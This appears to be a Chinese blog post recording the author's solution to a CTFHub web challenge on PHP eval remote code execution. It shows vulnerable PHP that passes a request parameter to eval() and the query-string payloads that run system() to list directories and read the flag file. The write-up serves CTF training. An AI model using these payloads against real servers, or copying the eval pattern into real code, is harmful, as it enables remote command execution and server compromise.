CTFHub 技能树 Web RCE eval执行(学习记录)

马船长2024-12-15 17:23

eval执行

源代码

php 复制代码 
<?php
if (isset($_REQUEST['cmd'])) {
    eval($_REQUEST["cmd"]);
} else {
    highlight_file(__FILE__);
}
?>

PHP代码显示,要求将命令赋值给cmd然后执行

先查看一下根目录文件 /?cmd=system("ls");

查看上一级目录找flag文件

/?cmd=system("ls /");

打开flag文件发现FLAG

/?cmd=system("cat /flag_9237");

linux在读取flag的时候可以使用*去匹配

cat /flag*

/?cmd=system("cat /flag*");

相关推荐
2501_945318497 小时前
备考方案:针对数据分析师的知识结构,制定攻克赛一认证的最优学习路径
学习·百度
2301_792674868 小时前
java学习day29(juc)
java·开发语言·学习
qq_5710993510 小时前
学习周报四十
学习
瑶光守护者11 小时前
【一文读懂】OpenClaw系统架构分析:自主人工智能智能体的范式迁移与技术底座分析
人工智能·笔记·学习·系统架构·边缘计算·openclaw
炽烈小老头12 小时前
【每天学习一点算法 2026/04/13】两数相除
学习·算法
_李小白12 小时前
【OSG学习笔记】Day 45: osg::Camera::DrawCallback (抓取图片)
笔记·学习
青苔猿猿12 小时前
OpenWebUI(20)源码学习-版本升级
人工智能·学习·ai·openwebui
不灭锦鲤13 小时前
网络安全学习第166天
学习
Century_Dragon13 小时前
世纪龙-驶入未来课堂:新能源汽车故障诊断虚拟实训软件助力职教
学习
Westward-sun.13 小时前
OpenCV + dlib 人脸关键点检测学习笔记(68点)
人工智能·笔记·opencv·学习·计算机视觉
热门推荐
012026年4月技术前沿:AI大模型爆发、智能体革命与量子安全新纪元02GitHub 镜像站点03一周AI热点速览(2026.03.31-04.06):GPT-6曝光、谷歌开源Gemma 4、资本狂飙与模型军备竞赛04基于 Docker 部署 Hermes Agent 并接入飞书机器人的完整指南05GPT-6核心能力解析及与现有主流大模型对比06零成本!Ollama本地部署国产大模型全指南(支持Kimi-K2.5/GLM-5/Qwen,新手秒上手)07免费!不限量!用opencode接入英伟达(NVIDIA)大模型,轻松打造你的 AI 编程助手08CodeBuddy与WorkBuddy深度对比:腾讯两款AI工具差异及实操指南09从限购到畅通:GLM-5.1 Coding Plan接入攻略10LLM Wiki:让大模型替你打理知识库的完整指南